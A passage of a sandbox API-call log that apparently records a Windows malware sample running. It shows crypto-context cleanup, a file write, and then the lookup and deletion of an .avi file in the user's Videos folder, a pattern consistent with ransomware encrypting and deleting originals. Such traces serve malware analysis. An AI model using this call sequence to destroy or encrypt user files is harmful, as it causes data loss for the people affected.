PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.710] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0213.710] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0213.710] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0213.710] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0213.710] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0213.710] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0213.710] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.710] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0213.710] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0213.710] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0213.710] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0213.710] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0213.710] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.710] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.710] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.715] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.715] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.715] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.717] WriteFile (in: hFile=0x520, lpBuffer=0x2a8a138*, nNumberOfBytesToWrite=0x12698, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a8a138*, lpNumberOfBytesWritten=0x8cf5e4*=0x12698, lpOverlapped=0x0) returned 1 [0213.719] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.719] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.719] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0213.719] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0213.719] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0213.719] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0213.719] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0213.719] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.719] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0213.719] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.719] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0213.719] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0213.720] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0213.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab6e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0213.720] CryptDestroyKey (hKey=0x9e21f8) returned 1 [0213.720] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0213.720] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0213.720] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0213.720] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0213.720] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0213.720] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0213.720] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0213.720] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0213.720] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0213.720] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0213.720] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0213.720] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0213.720] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0213.721] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0213.725] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0213.725] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0213.725] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0213.725] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0213.725] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0213.725] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0213.725] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0213.726] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0213.726] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0213.726] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.726] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0213.726] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.726] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0213.726] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.726] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.726] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0213.726] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.726] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0213.726] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.726] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.726] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.726] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.726] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0213.726] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0213.726] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0213.727] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0213.727] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0213.727] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.727] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.727] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0213.727] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.727] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0213.727] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0213.727] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0213.727] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0213.727] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0213.727] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0213.727] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0213.727] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0213.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7060, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0213.727] CryptReleaseContext (hProv=0xa7caa0, dwFlags=0x0) returned 1 [0213.727] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.728] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.728] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0213.728] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.728] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0213.728] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0213.728] FreeLibrary (hLibModule=0x76390000) returned 1 [0213.728] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.728] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.728] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.728] CloseHandle (hObject=0x468) returned 1 [0213.730] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.730] CloseHandle (hObject=0x520) returned 1 [0213.733] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.735] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.735] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0213.735] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0213.735] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/qt2pH0rRBDAlo9_9_.avi", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\qt2pH0rRBDAlo9_9_.avi", lpFilePart=0x8cedf4*="qt2pH0rRBDAlo9_9_.avi") returned 0x2c [0213.735] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\qt2pH0rRBDAlo9_9_.avi" (normalized: "c:\\users\\fd1hvy\\videos\\qt2ph0rrbdalo9_9_.avi")) returned 0x20 [0213.736] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\qt2pH0rRBDAlo9_9_.avi", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x239cade0, ftCreationTime.dwHighDateTime=0x1d5cdd0, ftLastAccessTime.dwLowDateTime=0xc7c16330, ftLastAccessTime.dwHighDateTime=0x1d5d289, ftLastWriteTime.dwLowDateTime=0xc7c16330, ftLastWriteTime.dwHighDateTime=0x1d5d289, nFileSizeHigh=0x0, nFileSizeLow=0x12697, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="qt2pH0rRBDAlo9_9_.avi", cAlternateFileName="QT2PH0~1.AVI")) returned 0x9e1d38 [0213.736] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\qt2pH0rRBDAlo9_9_.avi" (normalized: "c:\\users\\fd1hvy\\videos\\qt2ph0rrbdalo9_9_.avi")) returned 1 [0213.739] FindNextFileW (in: hFindFile=0x9e1d38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x239cade0, ftCreationTime.dwHighDateTime=0x1d5cdd0, ftLastAccessTime.dwLowDateTime=0xc7c16330, ftLastAccessTime.dwHighDateTime=0x1d5d289, ftLastWriteTime.dwLowDateTime=0xc7c16330, ftLastWriteTime.dwHighDateTime=0x1d5d289, nFileSizeHigh=0x0, nFileSizeLow=0x12697, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="qt2pH0rRBDAlo9_9_.avi", cAlternateFileName="QT2PH0~1.AVI")) returned 0 [0213.739] FindClose (in: hFindFile=0x9e1d38 | out: hFindFile=0x9e1d38) returned 1 [0213.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74a50 | out: hHeap=0x2af0000) returned 1 [0213.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0213.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0213.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0213.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0213.740] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0213.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0213.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0213.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0213.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0213.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0213.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0213.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0213.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0213.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0213.740] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0213.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0213.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0213.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0e0 [0213.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0213.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0213.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaafd8 [0213.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0213.740] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0213.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0213.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0213.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0213.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0213.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0213.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0213.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0213.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0213.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0213.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0213.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0213.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0213.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0213.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0213.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0213.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0213.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74d28 [0213.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0213.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0213.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0213.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0213.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0213.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0213.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0213.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0213.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0213.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0213.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0213.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0213.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0213.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0213.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0213.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0213.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0213.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0213.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0213.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: 